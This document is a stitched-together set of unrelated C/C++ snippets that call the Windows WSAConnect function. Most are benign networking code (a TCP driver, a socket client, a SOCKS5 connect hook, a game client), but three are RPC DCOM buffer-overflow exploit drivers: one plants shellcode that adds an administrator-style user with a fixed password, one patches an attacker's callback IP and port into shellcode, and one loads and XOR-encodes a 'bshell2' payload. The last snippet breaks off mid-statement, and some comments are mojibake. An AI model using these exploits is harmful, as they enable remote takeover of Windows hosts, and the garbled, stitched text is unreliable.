DWORD WINAPI CEgTcpDriver::Connect(const SOCKADDR_IN & Server) { if (!m_bInited) return 0;//0 is needed for Transport SOCKET Sock = CreateSocket(); if (Sock == INVALID_SOCKET) return WSAGetLastError(); int iRes = WSAEventSelect(Sock, m_hWsaEvents[WSAEVENTSELECT_EVENT], FD_CONNECT); if (iRes == SOCKET_ERROR ) { DWORD dwErr = WSAGetLastError(); closesocket(Sock); return dwErr; } PER_SOCKET_CONTEXT ConnectContext; ConnectContext.m_ConnectioID.m_Socket = Sock; ConnectContext.m_pIOContext.m_IoOperation = ClientIoRead; ConnectContext.m_ConnectioID.m_RemoteAddr = Server; m_SocketContextsLock.Lock(); pair<set<PER_SOCKET_CONTEXT>::iterator, bool> InsIt; while(true) { InsIt = m_SocketContexts.insert(ConnectContext); if (InsIt.second == true) break; SwitchToThread(); } PER_SOCKET_CONTEXT & SocketContext = *(InsIt.first); // ConnectEx lives on XP only ;(( int iRet = WSAConnect(SocketContext.m_ConnectioID.m_Socket, (LPSOCKADDR)&Server, sizeof(Server), NULL, NULL, NULL, NULL); DWORD dwErr = 0; if (SOCKET_ERROR == iRet && (WSAEWOULDBLOCK != WSAGetLastError())) { dwErr = WSAGetLastError(); if (dwErr == WSAECONNREFUSED) // Microsoft "feature" { WSANETWORKEVENTS NetworkEvents; int iRes = WSAEnumNetworkEvents(Sock, m_hWsaEvents[WSAEVENTSELECT_EVENT], &NetworkEvents); if (FD_CONNECT & NetworkEvents.lNetworkEvents) { CloseClient(SocketContext, CONNECTION_CANT_ESTABLISH); } } else CloseClient(SocketContext, CONNECTION_CANT_ESTABLISH); } m_SocketContextsLock.Unlock(); return dwErr; }
// TODO: To act as construct. bool libsockclient_init(char *Host, int Port) { WSADATA wsaData; struct hostent *pServer; struct sockaddr_in pServerAddr; int err; // TODO: To initial use of WS2_32.DLL by a process. err = WSAStartup(MAKEWORD(2, 2), &wsaData); if (err != 0) { #if DEBUG printf("DEBUG at %d: WSAStartup error.\n", __LINE__); #endif m_ErrorCode = WSAGetLastError(); return false; } // TODO: To create a socket that is bound to a specific transport service // provider, and optionally creates and/or joins a socket group. m_SocketHandler = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, WSA_FLAG_OVERLAPPED); if (m_SocketHandler == INVALID_SOCKET) { #if DEBUG printf("DEBUG at %d: WSASocket error.\n", __LINE__); #endif m_ErrorCode = WSAGetLastError(); return false; } // TODO: To retrieve host information corresponding to a host name from a // host database. pServer = gethostbyname(Host); if (pServer == NULL) { #if DEBUG printf("DEBUG at %d: gethostbyname error.\n", __LINE__); #endif m_ErrorCode = WSAGetLastError(); libsockclient_cleanup(); return false; } // TODO: To establishe a connection to another socket application, exchanges // connect data, and specifies needed quality of service based on the supplied // FLOWSPEC structure. ZeroMemory((char *)&pServerAddr, sizeof(pServerAddr)); pServerAddr.sin_family = AF_INET; pServerAddr.sin_port = htons(Port); CopyMemory((char *)&pServerAddr.sin_addr.s_addr, (char *)pServer->h_addr, pServer->h_length); if (SOCKET_ERROR == WSAConnect(m_SocketHandler, reinterpret_cast<const struct sockaddr *>(&pServerAddr), sizeof(pServerAddr), NULL, NULL, NULL, NULL)) { #if DEBUG printf("DEBUG at %d: WSAConnect error.\n", __LINE__); #endif libsockclient_cleanup(); m_ErrorCode = WSAGetLastError(); return false; } m_Host = Host; m_Port = Port; return true; }
DWORD tcp_connect( char *host, WORD port) { DWORD SockFD = 0; DWORD nb_io = 1; DWORD option = 0; struct linger lin; struct sockaddr_in DstSAin; BOOL disable_nagle; DstSAin.sin_family = AF_INET; DstSAin.sin_port = htons(port); DstSAin.sin_addr.s_addr= inet_addr(host); if((SockFD = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) { if(NETIO_DEBUG) fprintf(stderr, "[%08X] Error: Unable to allocate socket\n" ,WSAGetLastError()); return(-1); } if((WSAConnect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin),NULL,NULL,NULL,NULL)) == SOCKET_ERROR) { if(NETIO_DEBUG) fprintf(stderr, "[%08X] Error: Unable to connect to %s:%d\n" ,WSAGetLastError(),host,port); closesocket(SockFD); return(-1); } if((ioctlsocket(SockFD,FIONBIO,&nb_io)) == SOCKET_ERROR) { if(NETIO_DEBUG) fprintf(stderr, "[%08X] Error: Unable to set IO mode of socket %d\n" ,WSAGetLastError(),SockFD); closesocket(SockFD); return(-1); } lin.l_onoff = 1; lin.l_linger = 0; if((setsockopt(SockFD,SOL_SOCKET,SO_LINGER,(const char *)&lin,sizeof(lin))) == SOCKET_ERROR) { if(NETIO_DEBUG) fprintf(stderr, "[%08X] Error: Unable to set socket option SO_LINGER on socket %d\n" ,WSAGetLastError(),SockFD); closesocket(SockFD); return(-1); } disable_nagle = TRUE; if((setsockopt(SockFD,IPPROTO_TCP,TCP_NODELAY,(const char *)&disable_nagle,sizeof(disable_nagle))) == SOCKET_ERROR) { if(NETIO_DEBUG) fprintf(stderr, "[%08X] Error: Unable to set socket option TCP_NODELAY on socket %d\n" ,WSAGetLastError(),SockFD); closesocket(SockFD); return(-1); } return(SockFD); }
void main(int argc,char ** argv) { WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; int i, iType; printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n" "Base on flashsky's MS03-026 exp\n" "Code by ey4s<eyas#xfocus.org>\n" "2003-09-16\n" "Welcome to http://www.xfocus.net\n" "Thanks to flashsky & benjurry & Dave Aitel\n" "If success, target will add a user \"e\" and password is \"asd#321\"\n\n"); if(argc!=3) { printf("Usage: %s <target> <type>\n", argv[0]); for(i = 0; i < sizeof(targets)/sizeof(v); i++) printf( "<%d> %s\n" " TopSeh=0x%.8x in %s\n" " JmpAddr=0x%.8x in %s\n", i, targets[i].os, targets[i].dwTopSeh, targets[i].seh, targets[i].dwJmpAddr, targets[i].jmp); return; } iType = atoi(argv[2]); if((iType<0) || iType > sizeof(targets)/sizeof(v)) { printf("[-] Wrong type.\n"); return; } memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user)); memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4); memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4); printf("[+] Prepare shellcode completed.\n"); if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return; } if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("Connect failed.Error:%d",WSAGetLastError()); return; } printf("[+] Connect to %s:135 success.\n", argv[1]); if(sizeof(sc_add_user) > sc_max) { printf("[-] shellcode too long, exit.\n"); return; } len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //计算文件名双字节长度 *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长度 memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc; //计算各种结构的长度 *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc; len = send(sock,bindstr,sizeof(bindstr),0); if(len<=0) { printf("[-] Send failed.Error:%d\n",WSAGetLastError()); return; } else printf("[+] send %d bytes.\n", len); len=recv(sock,buf1,1000,0); if(len<=0) { printf("[-] recv error:%d\n", GetLastError()); return; } else printf("[+] recv %d bytes.\n", len); len = send(sock,buf2,len1,0); if(len<=0) { printf("[-] Send failed.Error:%d\n",WSAGetLastError()); return; } else printf("[+] send %d bytes.\n", len); len=recv(sock,buf1,1024,0); if(len<=0) { printf("[+] Target crash or exploit success? :)\n"); } else printf("[-] recv %d bytes. Bad luck!\n", len); }
int WINAPI new_WSAConnect(SOCKET s, const struct sockaddr *name, int namelen, LPWSABUF lpCallerData, LPWSABUF lpCalleeData, LPQOS lpSQOS, LPQOS lpGQOS) { int rc, err; struct sockaddr_in in_addr; struct sockaddr_in out_addr; char buf[256]; fd_set set; DEBUG_ENTER; memcpy(&in_addr, name, sizeof(in_addr)); /* change non-local */ if (in_addr.sin_addr.s_addr != inet_addr("127.0.0.1")) { DEBUG; out_addr.sin_family = AF_INET; out_addr.sin_port = htons(1080); out_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); } DEBUG; /* connect */ _unhook(2); rc = WSAConnect(s, (struct sockaddr *) (&out_addr), sizeof(struct sockaddr_in), lpCallerData, lpCalleeData, lpSQOS, lpGQOS); err = WSAGetLastError(); #if defined(_DEBUG) || defined(_DEBUG_) TRACE_NO("connect (rc:%i err:%i pid:%i): %s\n", rc, err, GetCurrentProcessId(), socketError()); #endif _hook(2); if (rc != 0 && err != WSAEWOULDBLOCK) { closesocket(s); DEBUG_LEAVE; return rc; } /* pass through local */ if (in_addr.sin_addr.s_addr == inet_addr("127.0.0.1")) { DEBUG_LEAVE; return rc; } /* fd_set */ FD_ZERO(&set); FD_SET(s, &set); /* sock5 handshake */ select(s + 1, NULL, &set, NULL, 0); rc = send(s, "\x05\x01\x00", 3, 0); #if defined(_DEBUG) || defined(_DEBUG_) TRACE_VERBOSE("send (rc:%i err:%i pid:%i): %s\n", rc, WSAGetLastError(), GetCurrentProcessId(), socketError()); #endif if (rc != 3) { closesocket(s); DEBUG_LEAVE; return SOCKET_ERROR; } /* socks5 ack */ select(s + 1, &set, NULL, NULL, 0); rc = recv(s, buf, 256, 0); #if defined(_DEBUG) || defined(_DEBUG_) TRACE_VERBOSE("recv (rc:%i err:%i pid:%i): %s\n", rc, WSAGetLastError(), GetCurrentProcessId(), socketError()); DUMP(buf, rc); #endif if (rc != 2) { closesocket(s); DEBUG_LEAVE; return SOCKET_ERROR; } /* socks5 request */ memcpy(buf, "\x05\x01\x00\x01", 4); memcpy(buf + 4, &in_addr.sin_addr.s_addr, 4); memcpy(buf + 8, &in_addr.sin_port, 2); select(s + 1, NULL, &set, NULL, 0); rc = send(s, buf, 10, 0); #if defined(_DEBUG) || defined(_DEBUG_) TRACE_VERBOSE("send (rc:%i err:%i pid:%i): %s\n", rc, WSAGetLastError(), GetCurrentProcessId(), socketError()); #endif if (rc != 10) { closesocket(s); DEBUG_LEAVE; return SOCKET_ERROR; } /* socks5 ack */ select(s + 1, &set, NULL, NULL, 0); rc = recv(s, buf, 256, 0); #if defined(_DEBUG) || defined(_DEBUG_) TRACE_VERBOSE("recv (rc:%i err:%i pid:%i): %s\n", rc, WSAGetLastError(), GetCurrentProcessId(), socketError()); DUMP(buf, rc); #endif if (rc != 10) { closesocket(s); DEBUG_LEAVE; return SOCKET_ERROR; } DEBUG_LEAVE; return 0; }
Socket *Network::ConnectSocket(const char *address, unsigned short port, SocketTransportLayer transport) { addrinfo *result = NULL; addrinfo *ptr = NULL; addrinfo hints; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_INET; hints.ai_socktype = (transport == SocketOverTCP) ? SOCK_STREAM : SOCK_DGRAM; hints.ai_protocol = (transport == SocketOverTCP) ? IPPROTO_TCP : IPPROTO_UDP; char strPort[256]; sprintf(strPort, "%d", (unsigned int)port); int ret = getaddrinfo(address, strPort, &hints, &result); if (ret != 0) { LOG(LogError, "Network::Connect: getaddrinfo failed: %s", GetErrorString(ret).c_str()); return 0; } #ifdef WIN32 SOCKET connectSocket = WSASocket(result->ai_family, result->ai_socktype, result->ai_protocol, NULL, 0, WSA_FLAG_OVERLAPPED); #else SOCKET connectSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); LOG(LogInfo, "A call to socket() returned a new socket 0x%8X.", (unsigned int)connectSocket); #endif if (connectSocket == INVALID_SOCKET) { LOG(LogError, "Network::Connect: Error at socket(): %s", GetLastErrorString().c_str()); freeaddrinfo(result); return 0; } // Connect to server. #ifdef WIN32 ret = WSAConnect(connectSocket, result->ai_addr, (int)result->ai_addrlen, 0, 0, 0, 0); #else ret = connect(connectSocket, result->ai_addr, (int)result->ai_addrlen); #endif if (ret == KNET_SOCKET_ERROR) { closesocket(connectSocket); connectSocket = INVALID_SOCKET; } freeaddrinfo(result); if (connectSocket == INVALID_SOCKET) { LOG(LogError, "Unable to connect to server!"); return 0; } EndPoint localEndPoint; sockaddr_in sockname; socklen_t socknamelen = sizeof(sockname); ret = getsockname(connectSocket, (sockaddr*)&sockname, &socknamelen); if (ret == 0) localEndPoint = EndPoint::FromSockAddrIn(sockname); else LOG(LogError, "Network::ConnectSocket: getsockname failed: %s!", Network::GetLastErrorString().c_str()); EndPoint remoteEndPoint; sockaddr_in peername; socklen_t peernamelen = sizeof(peername); ret = getpeername(connectSocket, (sockaddr*)&peername, &peernamelen); if (ret == 0) remoteEndPoint = EndPoint::FromSockAddrIn(peername); else LOG(LogError, "Network::ConnectSocket: getpeername failed: %s!", Network::GetLastErrorString().c_str()); std::string remoteHostName = remoteEndPoint.IPToString(); const size_t maxSendSize = (transport == SocketOverTCP) ? cMaxTCPSendSize : cMaxUDPSendSize; Socket socket(connectSocket, localEndPoint, localHostName.c_str(), remoteEndPoint, remoteHostName.c_str(), transport, ClientSocket, maxSendSize); socket.SetBlocking(false); sockets.push_back(socket); Socket *sock = &sockets.back(); return sock; }
LRESULT CALLBACK WndProc(HWND hWnd, UINT iMessage, WPARAM wParam, LPARAM lParam) { HDC hdc; static BOOL bnowDraw = FALSE; int retval; PAINTSTRUCT ps; //static point line; static HANDLE hTimer; HBRUSH MyBrush, OldBrush; HPEN Mypen, Oldpen; static int CH_x, CH_y; //케릭터 좌표 static int direction; static int num; //배게 번호 static bool pillow[5]; //배게 5개 랜덤 등장 static bool have_pillow; static int hori; // x축 0-> 초기 1-> + 2-> - static int verti; // y축 static bool shoot; // 총알(한번에 열개 까지) // 서버에서는 쏘았다는 신호만 보내 줄 것 static int shootCount; static int pillow_x[5], pillow_y[5]; //배게의 위치 switch (iMessage) { case WM_CREATE: // 윈속 초기화 WSADATA wsa; if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return 1; // socket() Mysock =WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); if (Mysock == INVALID_SOCKET) err_quit("socket()"); // connect() SOCKADDR_IN serveraddr; ZeroMemory(&serveraddr, sizeof(serveraddr)); serveraddr.sin_family = AF_INET; serveraddr.sin_addr.s_addr = inet_addr(SERVERIP); serveraddr.sin_port = htons(SERVERPORT); retval = WSAConnect(Mysock, (sockaddr *)&serveraddr, sizeof(serveraddr), NULL, NULL, NULL, NULL); if (retval == SOCKET_ERROR) err_quit("connect()"); WSAAsyncSelect(Mysock, hWnd, WM_SOCKET, FD_CLOSE | FD_READ); sendWSA.buf = send_buf; sendWSA.len = BUFSIZE; recvWSA.buf = recv_buf; recvWSA.len = BUFSIZE; // 데이터 통신에 사용할 변수 char buf[BUFSIZE + 1]; int len; return 0; hori = 0; verti = 0; shootCount = 0; shoot = false; //hTimer = (HANDLE)SetTimer(hWnd, 1, 30, NULL); return 0; case WM_KEYDOWN:{ if (GameStart){ //CS_ShootKey *shootkey = reinterpret_cast<CS_ShootKey*>(send_buf); CS_key *key = reinterpret_cast<CS_key*> (send_buf); if (wParam == VK_RIGHT){ hori = 1; verti = 0; } if (wParam == VK_LEFT){ hori = 2; verti = 0; } if (wParam == VK_UP){ verti = 1; hori = 0; } if (wParam == VK_DOWN){ verti = 2; hori = 0; }/*if (wParam == VK_SPACE){ shoot = true; }*/ key->type = CS_KEY; key->size = sizeof(CS_key); sendWSA.len = sizeof(CS_key); int ret; DWORD iobyte; if (0 != hori){ if (1 == hori) { key->movetype = KEY_RIGHT; key->direction = 1; } else{ key->movetype = KEY_LEFT; key->direction = 2; } } if (0 != verti){ if (1 == verti) { key->movetype = KEY_UP; key->direction = 3; } else { key->movetype = KEY_DOWN; key->direction = 4; } } ret = WSASend(Mysock, &sendWSA, 1, &iobyte, 0, NULL, NULL); if (ret){ int error_code = WSAGetLastError(); printf("Error while sending packet[%d]", error_code); } //InvalidateRect(hWnd, NULL, TRUE); } } return 0; case WM_KEYUP: shoot = false; return 0; case WM_PAINT: hdc = BeginPaint(hWnd, &ps); //게임 공간 Rectangle(hdc, 20, 20, 400, 400); //임시 케릭터 if (Mych){ MyBrush = CreateHatchBrush(HS_BDIAGONAL, RGB(255, 0, 0)); OldBrush = (HBRUSH)SelectObject(hdc, MyBrush); Mypen = CreatePen(PS_SOLID, 1, RGB(255, 0, 0)); Oldpen = (HPEN)SelectObject(hdc, Mypen); Ellipse(hdc, pl.x, pl.y, pl.x + 20, pl.y + 20); //캐릭터 본체(원형) //if (direction == 1){ //방향 삼각형(오른쪽) // MoveToEx(hdc, pl.x + 20, pl.y, NULL); // LineTo(hdc, pl.x + 20, pl.y + 20); // MoveToEx(hdc, pl.x + 20, pl.y + 20, NULL); // LineTo(hdc, pl.x + 30, pl.y + 10); // MoveToEx(hdc, pl.x + 30, pl.y + 10, NULL); // LineTo(hdc, pl.x + 20, pl.y); //}if (direction == 2){ //방향 삼각형(왼쪽) // MoveToEx(hdc, pl.x, pl.y, NULL); // LineTo(hdc, pl.x, pl.y + 20); // MoveToEx(hdc, pl.x, pl.y + 20, NULL); // LineTo(hdc, pl.x - 10, pl.y + 10); // MoveToEx(hdc, pl.x - 10, pl.y + 10, NULL); // LineTo(hdc, pl.x, pl.y); //}if (direction == 3){ //방향 삼각형(위) // MoveToEx(hdc, pl.x, pl.y, NULL); // LineTo(hdc, pl.x + 20, pl.y); // MoveToEx(hdc, pl.x + 20, pl.y, NULL); // LineTo(hdc, pl.x + 10, pl.y - 10); // MoveToEx(hdc, pl.x + 10, pl.y - 10, NULL); // LineTo(hdc, pl.x, pl.y); //}if (direction == 4){ //방향 삼각형(아래) // MoveToEx(hdc, pl.x, pl.y + 20, NULL); // LineTo(hdc, pl.x + 20, pl.y + 20); // MoveToEx(hdc, pl.x + 20, pl.y + 20, NULL); // LineTo(hdc, pl.x + 10, pl.y + 30); // MoveToEx(hdc, pl.x + 10, pl.y + 30, NULL); // LineTo(hdc, pl.x, pl.y + 20); //} SelectObject(hdc, OldBrush); SelectObject(hdc, Oldpen); DeleteObject(MyBrush); DeleteObject(Mypen); } for (int i = 0; i < 8; ++i){ if (Enemych[i]){ // 타 플레이어 MyBrush = CreateHatchBrush(HS_BDIAGONAL, RGB(0, 0, 0)); OldBrush = (HBRUSH)SelectObject(hdc, MyBrush); Mypen = CreatePen(PS_SOLID, 1, RGB(0, 0, 0)); Oldpen = (HPEN)SelectObject(hdc, Mypen); Ellipse(hdc, enemy[i].x, enemy[i].y, enemy[i].x + 20, enemy[i].y + 20); //캐릭터 본체(원형) //if (direction == 1){ //방향 삼각형(오른쪽) // MoveToEx(hdc, enemy[i].x + 20, enemy[i].y, NULL); // LineTo(hdc, enemy[i].x + 20, enemy[i].y + 20); // MoveToEx(hdc, enemy[i].x + 20, enemy[i].y + 20, NULL); // LineTo(hdc, enemy[i].x + 30, enemy[i].y + 10); // MoveToEx(hdc, enemy[i].x + 30, enemy[i].y + 10, NULL); // LineTo(hdc, enemy[i].x + 20, enemy[i].y); //}if (direction == 2){ //방향 삼각형(왼쪽) // MoveToEx(hdc, enemy[i].x, enemy[i].y, NULL); // LineTo(hdc, enemy[i].x, enemy[i].y + 20); // MoveToEx(hdc, enemy[i].x, enemy[i].y + 20, NULL); // LineTo(hdc, enemy[i].x - 10, enemy[i].y + 10); // MoveToEx(hdc, enemy[i].x - 10, enemy[i].y + 10, NULL); // LineTo(hdc, enemy[i].x, enemy[i].y); //}if (direction == 3){ //방향 삼각형(위) // MoveToEx(hdc, enemy[i].x, enemy[i].y, NULL); // LineTo(hdc, enemy[i].x + 20, enemy[i].y); // MoveToEx(hdc, enemy[i].x + 20, enemy[i].y, NULL); // LineTo(hdc, enemy[i].x + 10, enemy[i].y - 10); // MoveToEx(hdc, enemy[i].x + 10, enemy[i].y - 10, NULL); // LineTo(hdc, enemy[i].x, enemy[i].y); //}if (direction == 4){ //방향 삼각형(아래) // MoveToEx(hdc, enemy[i].x, enemy[i].y + 20, NULL); // LineTo(hdc, enemy[i].x + 20, enemy[i].y + 20); // MoveToEx(hdc, enemy[i].x + 20, enemy[i].y + 20, NULL); // LineTo(hdc, enemy[i].x + 10, enemy[i].y + 30); // MoveToEx(hdc, enemy[i].x + 10, enemy[i].y + 30, NULL); // LineTo(hdc, enemy[i].x, enemy[i].y + 20); //} SelectObject(hdc, OldBrush); SelectObject(hdc, Oldpen); DeleteObject(MyBrush); DeleteObject(Mypen); } } EndPaint(hWnd, &ps); return 0; case WM_SOCKET: if (WSAGETSELECTERROR(lParam)){ closesocket((SOCKET)wParam); exit(-1); break; } switch (WSAGETSELECTEVENT(lParam)){ case FD_READ: ReadPacket((SOCKET)wParam); break; case FD_CLOSE: closesocket((SOCKET)wParam); exit(-1); break; } default:break; case WM_DESTROY: //KillTimer(hWnd, 1);A PostQuitMessage(0); return 0; } return(DefWindowProc(hWnd, iMessage, wParam, lParam)); }
void main(int argc,char ** argv) { WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; unsigned short port1; DWORD cb; printf("RPC DCOM overflow Vulnerability discoveried by LSD\n"); printf("Code by FlashSky,[email protected],benjurry,[email protected]\n"); printf("Welcome to our English Site: http://www.xfocus.org\n"); printf("Welcome to our Chinese Site: http://www.xfocus.net\n"); if(argc<5) { printf("useage:%s targetip localIP LocalPort SPVersion\n",argv[0]); printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese version +SP4\n 2 winxp English version +sp1\n"); exit(1); } if(atoi(argv[4])==0) memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3)); else if (atoi(argv[4])==1) memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4)); else if (atoi(argv[4])==2) memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1)); if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return; } if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("Connect failed.Error:%d",WSAGetLastError()); return; } port1 = htons(atoi(argv[3])); port1 ^= 0x9393; cb=inet_addr(argv[2]); cb ^= 0x93939393; *(unsigned short *)&sc[330+0x30] = port1; *(unsigned int *)&sc[335+0x30] = cb; len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc; if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } len=recv(sock,buf1,1000,NULL); if (send(sock,buf2,len1,0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } len=recv(sock,buf1,1024,NULL); }
int _connect(T_SOCKET s, struct sockaddr *sock) { return (WSAConnect(s, sock, sizeof(struct sockaddr), NULL, NULL, NULL, NULL)); }
int attack(char *ip1,bool atack) { unsigned char rawData[1036]; memcpy(rawData,rawData1,1036); unsigned char shellcode[50000]; char ip[200]; strcpy(ip,ip1); WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[50000]; unsigned char buf2[50000]; printf("%s\n",ip); //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); //printf("Code by FlashSky,Flashsky xfocus org\n"); //printf("Welcome to our Site: http://www.xfocus.org\n"); //printf("Welcome to our Site: http://www.venustech.com.cn\n"); /* if(argc!=3) { printf("%s targetIP targetOS\ntargets:\n",argv[0]); for(int i=0;i<sizeof(target_os)/sizeof(v);i++) printf("%d - %s\n",i,target_os.target); printf("\n%x\n",GETSTRCS(argv[1])); return; } */ /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } */ addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(ip); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return 0; } len1=sizeof(request1); len=sizeof(rawData); if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("%s - connect failed\n",ip); return 0; } int vers=!version(ip,sock); // printf("%d\n",vers); // return; // int vers=1; FILE *fp; //ç¨â ¥¬ ¯ ª¥â // fp=fopen("shellcode","rb"); // fread(rawData,1,1036,fp); // fclose(fp); //⥯¥àì 㦮 ááç¨â âì ¥¯®á।á⢥® ¨á¯®«ï¥¬ë© 襫«ª®¤! fp=fopen("bshell2","rb"); int sz=fread(shellcode,1,1024,fp); fclose(fp); // printf("%d\n",sz); for(int i=0;i<sz;i++) rawData[i+0x71]=shellcode[i]; // fp=fopen("badfile.exe","rb"); // unsigned int sz1=fread(shellcode,1,50000,fp); // fclose(fp); // for(i=0;i<sz1;i++) // rawData[i+0x240]=shellcode; // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); // return; //¥à¥¤ ⥬ ª ª ªá®à¨âì § ¯¨è¥¬ ¤à¥á ᢮¡®¤®£® HEAP'a // DWORD heap=0x00180000; // int k=vers; // vers=1; // *(DWORD *)(rawData+0xae)=target_os[vers].heap; *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; //’¥¯¥àì 㦮 ¯à®ªá®à¨âì è ª®¤, ¤«ï ⮣® çâ®¡ë ¯®«ãç¨âì ã¦ë© XOR(rawData,0x71,sz,0x99); // XOR(rawData,0x240,sz1,0x99); //’ ª ¦¥ ¬ 㦮 § ¯¨á âì ã¦ë© ¬ SEH ¨ JMP DWORD seh=target_os[vers].seh; DWORD jmp=target_os[vers].jmp; *(DWORD *)(rawData+0x22a)=jmp; *(DWORD *)(rawData+0x22e)=seh; // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); *(WORD *)(rawData+0x62)=sz; memcpy(buf2,request1,sizeof(request1)); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,rawData,sizeof(rawData)); len1=len1+sizeof(rawData); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; *(DWORD 